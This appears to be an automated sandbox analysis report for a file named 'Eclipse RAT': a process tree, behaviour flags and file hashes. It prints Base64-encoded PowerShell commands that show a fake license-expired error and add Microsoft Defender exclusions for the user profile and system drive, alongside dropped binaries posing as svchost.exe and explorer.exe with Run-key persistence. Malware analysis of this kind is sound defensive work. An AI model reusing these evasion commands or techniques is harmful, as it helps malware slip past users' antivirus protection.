- Suspicious use of SetWindowsHookEx
PID:3844 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGkAdAB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGkAZAB4ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACEAIABMAGkAYwBlAG4AcwBlACAAaABhAHMAIABlAHgAcABpAHIAZQBkAC4AIABDAG8AbgB0AGEAYwB0ACAAdQBzACAAdgBpAGEAIAB0AGUAbABlAGcAcgBhAG0AIABnAHIAbwB1AHAAIAB0AG8AIABwAHUAcgBjAGgAYQBzAGUAIAAvACAAZwBlAHQAIABmAHIAZQBlACAAdAByAGkAYQBsACAAdgBlAHIAcwBpAG8AbgAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBwAG0AZAAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:7716
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGsAdwBmACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAZQBnACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGEAdQB2ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAegBlACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:8172
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5684
-
-
C:\Users\Admin\AppData\Roaming\explorer.exe"C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3928 -
C:\Users\Admin\AppData\Roaming\explorer.exe"C:\Users\Admin\AppData\Roaming\explorer.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:3204 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:5616
-
-
-
-
-
C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe"C:\Users\Admin\Downloads\Eclipse RAT\Eclipse.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5792 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAYQBzACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGUAbQBmACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcARQByAHIAbwByACEAIABMAGkAYwBlAG4AcwBlACAAaABhAHMAIABlAHgAcABpAHIAZQBkAC4AIABDAG8AbgB0AGEAYwB0ACAAdQBzACAAdgBpAGEAIAB0AGUAbABlAGcAcgBhAG0AIABnAHIAbwB1AHAAIAB0AG8AIABwAHUAcgBjAGgAYQBzAGUAIAAvACAAZwBlAHQAIABmAHIAZQBlACAAdAByAGkAYQBsACAAdgBlAHIAcwBpAG8AbgAhACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBmAHoAeAAjAD4A"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5164
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAZABtACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbgBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAYwB5ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAZgBnACMAPgA="3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\svchost.exe"C:\Users\Admin\AppData\Local\Temp\svchost.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1008
-
-
C:\Users\Admin\AppData\Roaming\explorer.exe"C:\Users\Admin\AppData\Roaming\explorer.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1488 -
C:\Users\Admin\AppData\Roaming\explorer.exe"C:\Users\Admin\AppData\Roaming\explorer.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetWindowsHookEx
PID:7388 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "ver"5⤵PID:5268
-
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding1⤵PID:4104
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
- Modifies registry class
PID:2784
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD59ffb5f81e8eccd0963c46cbfea1abc20
SHA1a02a610afd3543de215565bc488a4343bb5c1a59
SHA2563a654b499247e59e34040f3b192a0069e8f3904e2398cbed90e86d981378e8bc
SHA5122d21e18ef3f800e6e43b8cf03639d04510433c04215923f5a96432a8aa361fdda282cd444210150d9dbf8f028825d5bc8a451fd53bd3e0c9528eeb80d6e86597
-
Filesize
152B
MD5e1b45169ebca0dceadb0f45697799d62
SHA1803604277318898e6f5c6fb92270ca83b5609cd5
SHA2564c0224fb7cc26ccf74f5be586f18401db57cce935c767a446659b828a7b5ee60
SHA512357965b8d5cfaf773dbd9b371d7e308d1c86a6c428e542adbfe6bac34a7d2061d0a2f59e84e5b42768930e9b109e9e9f2a87e95cf26b3a69cbff05654ee42b4e
-
Filesize
19KB
MD51aea0a3555e0aa11fcdf612aba960b23
SHA117a314540bc816ab4c0b4943fd1af3206a66b6c0
SHA2563b82bca8b33cc0cd589bc17a94c12f6e41b4646a21659ac8e4b5e9a4a16cb513
SHA512a57237cbd14089734c8f0495c974b9f424d06415fa99756a39e3667adad50020ea5c537b5b9081ff8135e71e529186ef6d455e2bed684fae5d3c7e281f2a3d3c
-
Filesize
1024KB
MD54322f0449af173fb3994d2bef7ecb2e4
SHA1b6ee5c6f76b8eee448f6b4b2b56fa1ec39653934
SHA2560502e6e2f3fc54a30dea0eb07eb19a395c7ea6fc273321a49a4cc977a59b7cc9
SHA512d8bae6131a5a8a1fcabb2d7efebc6cdbba27955fb77484a5d87dbce7a237c0cd5e19b74b4dad28312929ad732d3b80cf3d7f15f059c88438d0bc6ff9535ceeef
-
Filesize
242KB
MD5f956edde726a7fcfeb3719374e05ae21
SHA12621a5d035cdf56c2e762cdddcd7ba4147afb46e
SHA256189fe4b4e8fe5d24df4abded9d160251dec0dc80046ea08edec3d716c0f094e0
SHA5124dbb6f109f4b5aaca90fd9d898ebea16124065822c7e451ee47ab0f62f18427427817fca5ecc5feb394c3697d3b21ad66dbc4765d69cda227d9f233fbcb8ad14
-
Filesize
39KB
MD55f8538a4c96496a08cbef532c5b0b853
SHA1f63f4dbc1c578d43801f516a131e40b69157ed9b
SHA256edff87a04b1982d56adb6e79d3c2c527925988d7ef3a2ed838b51ae00def7c23
SHA51205aaacba64365dd942a48a981babb8e7571b8215c3ebea6117c57487eb7c5f1d3c9ff0d1586d888614a7c8a90713e1789fab7349fdbd51973013d73c6866fc80
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD55b6c777d551fe02b413685351f35470c
SHA14e331a56ada5e42d7444d0de10d9e358328b381f
SHA2561ce1556149d1415ef2754ef06ebf68d68dcc5f036740513a4abb6d368f429e2a
SHA512f135120806c14cf8260257fa9302ed0ae09293f5a1a7c034829722a1af93e506bbeef9a01119a82d9f4631d5bcbd22ffd04ce1881fe367e288904705e8351316
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_sync.a-mo.net_0.indexeddb.leveldb\CURRENT
Filesize16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
15KB
MD5c4e4c9deae4c995677e70588ef8df38c
SHA1d42c013090732efeeb095e26f71e26e3f14abecb
SHA256a50a6726c31ebf578a82ddb935bfeb1fb777737e82497f58ef0041eb18ff95d8
SHA512ed11f7a9e4fdc900597832838509e53124ef6c81038dd61814f5f47249ea2c9e073195f64813044c1e3b17c482e86185faf13176471a8aba1788e35a1f2ff131
-
Filesize
20KB
MD55ba006e5306355b8e8ef514d10626057
SHA19e50102d0b7ede76f6132163d9047781ac7763fc
SHA25671529093e9d1eaf1a3f42f7ee2bde40a655bfe96bfcc6f46d2dd503e4bb91cb6
SHA5127cfcac3498ad943504f5501fab2b637a0f28950928015c31d5ba53253415458e8260f641178c9fd87c97e053ae0b681303916e983fc0ceb850846737f38facd9
-
Filesize
6KB
MD527d58eddb54877fbef27457afb067271
SHA196ddf544667a85043abf616fe04b6b4eabb388c6
SHA25627ccbfad05ca880b964c7499c96723d445eea52cd65b3e56c0206cc48003529f
SHA512885d1ea6cc105eeeab75611f2593866cf8403594084ab564dcbc72fc23c9fa7fe176f28d189e6444993bb9dbb8c80aa455fe6fec15b3e5c6c1a14a6e6d867a8d
-
Filesize
13KB
MD5dded7addc02129b3d15094e9004c7ca2
SHA13167ee07abf5f28d615eb089b5ccf4a3f096e3a1
SHA256a2595a54be3e4d05d3e49b0acf0b97d05c3b9b9eb96904447eaec690b719caf1
SHA5120bd4d98df1ca247f3025aa7958d1658ca95f073627057b3fafb2263222d5688ec42e815c7d815cd60d8c0e9bc8258b4dbba20c517280f5af523458d5f8d7a8d1
-
Filesize
20KB
MD540d0f8aa917c8f293288f2d7245d0649
SHA11db8f2519aabe8e12f082408cd29c65c6407cf22
SHA256ed26ab2c89099afb8658b62d4c6ee16f191fe4d2ce82b77bf664bb3b5b56ecd0
SHA512ac4651427cee8b6a38211debd33e745e2e054a561c7a1288245d0e9e901e910f494170df28b5c6d0003e33744f5584bd939dc6d739e04c0aa5d7202534f0f0be
-
Filesize
4KB
MD5a93f18510627e0fe74e66988d8b6df5d
SHA1280d5bbf1dacf4bd09414b2bd6675495e54c945a
SHA256c8d78cdbc5053baed992507b6aa4a5543037bccd2cd516f40c8c7d5ec8f29f00
SHA512d5f355411f1e5982f0d99f5061da6261170cd7ca2cd8590062ace600b387be48bfb4d8dcb43c80555a9b89c65658c1d498a92ed5222d80b145cf89ec0e80aa74
-
Filesize
4KB
MD5be64860990a3c9f9a86a42230514a913
SHA16876c1fbcbbc014fe0dfb6feb64f0e06caed59ad
SHA2566622cb9f2fbf9cb4387c4c08e7deb9f0f9df56d9c172e8472fd2947fa0a96256
SHA5121051f4d682c2f7a8ea07891c33ceb840f3d7d2d868ca9945c483d7c2cd9a76dc6ad09e5e1d125330c5fe49d02022281e3766f26c46ed5afcf2e5861fa51e70cf
-
Filesize
1KB
MD538536ee08c4523ce180a353bade5f0dd
SHA1aaebdd3f6d666c1f382622155dd0541b50bb6cb2
SHA256f2a54092997469f0731eb93c9e91694c163c7b5dc82d0db93b3e5247d4be91bb
SHA51264ab68232990ff141e8ab968414dbd565b5bd22513517c65804b1f4672fc64235392f2894d27718994a0969a76af4d19ed91817fa917ae5c099d9154930ec7af
-
Filesize
16B
MD56752a1d65b201c13b62ea44016eb221f
SHA158ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA2560861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA5129cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389
-
Filesize
11KB
MD595294f3c09adea681206f88fc36c7916
SHA19667b2003cbf2a4f13fa5978d4df96ac6ea075f1
SHA256c1b9a5731fe5a54f582016dd82b53bfca3d85b6dc8c006b889006010d01ae801
SHA512f63b8c5289b001aa83bd19a6b1cbadffed9d0a046e14e22b0f821a0299bd540bd36c065a7cce2d66fe1b13b7c9ae7a129831e2d6375c739955df68c270d25f26
-
Filesize
12KB
MD531f61292015c32b9f0828047c4e95e87
SHA13972523f17e7416400a64aa7c07f45dd39157373
SHA256936a951d8898298b8844d37928bf1e6055b96a0db69d85328eeb6556034b5e21
SHA51200a2c3f18511a35138b8d2b9e6e24c10eb9fd3cd36ab12447f99711270630b39c16baed59901327c7a8028671919c7a59770b83713c8a909d9f2a4a83d56664d
-
Filesize
11KB
MD57959d67fc58d2f4fe03d4649f6097e43
SHA108afb41ea3b8e0c7ab005f435d7cac3699be0224
SHA25699beac05b48d243318e199cae9756f0ab237314b885dd00e195897e92f19d8ee
SHA512631c6a8e0e5d798327578e7de2b95555b519e5dc5768ea36a8bbee5ab4fa3a1d3863a49dab8f106103d5a04e6e433d24925030a4eb3877007587f4ac829f9c5a
-
Filesize
95KB
MD5f34eb034aa4a9735218686590cba2e8b
SHA12bc20acdcb201676b77a66fa7ec6b53fa2644713
SHA2569d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1
SHA512d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af
-
Filesize
1.4MB
MD53f782cf7874b03c1d20ed90d370f4329
SHA108a2b4a21092321de1dcad1bb2afb660b0fa7749
SHA2562a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6
SHA512950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
355KB
MD52ef91bf37b3da8cad6751b665bd4e6af
SHA15c15bbc721f91855388861d378cf9d26a140cead
SHA2565263ecab05efc0fda51526658fdfa446f6108c009b8c2ddc9dd93ba29ea691b7
SHA51216f1846fde3d65413d1c478b59761cb5b74c5fa4556c7234858010efc05e81e305c9054895e388e9de85f6a55d05d6ac0236ed85dcdce3b82b0a82b4986eb2a3
-
Filesize
4.4MB
MD5ce453607540a4b0e0c88476042d31791
SHA19fe09b42424e044a7c11aea2f214a3d86de8f5a1
SHA2569a10c5b653feff9be0898a0ae18f7479e36275896bd4482f1fec237cf9ce619c
SHA512f0fdcd4e5fdbc03d4a3bb1eee4b69c6bf2585a609f9fc56739e9320d1072a7935ce126e7dc737ad1592f64023c3a17d0e0dd659a5d3a4ee940ca2301e81912ee
-
Filesize
4.7MB
MD512004ffe642ec0361cd3d4a8172d41ce
SHA1a1663cd6053e0887aaa9c975f54b7f7c2fe46944
SHA256468c505bb1633c5e3f810884c1d1a68f328c656acd95d0fe3fe6663a96995b56
SHA5125ab7201f7202cb242037000b98e70f507055d702bb96c72aa2b1ff8c906df6a051643e3068685a39e31df2f8b21ab28f5e1c9902e3fefde137dc50546826b5ae
-
Filesize
14.0MB
MD5c96630864da44a58d788cea48868142b
SHA130af27c3cdc28b7e812581ea315041d986f72efc
SHA256c42173527d3da78f3bc2fb45dd1b37a1c017696868d354a807e283266dddfee8
SHA512b0a3bc7b25843bc489c61acc7d31f787cb9a5de67ce09867b09960b0593e56557e951d7021dd6a6b30f20985bc64cf1050ce05e8d2a2ca00feb0344b8a9a928f
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e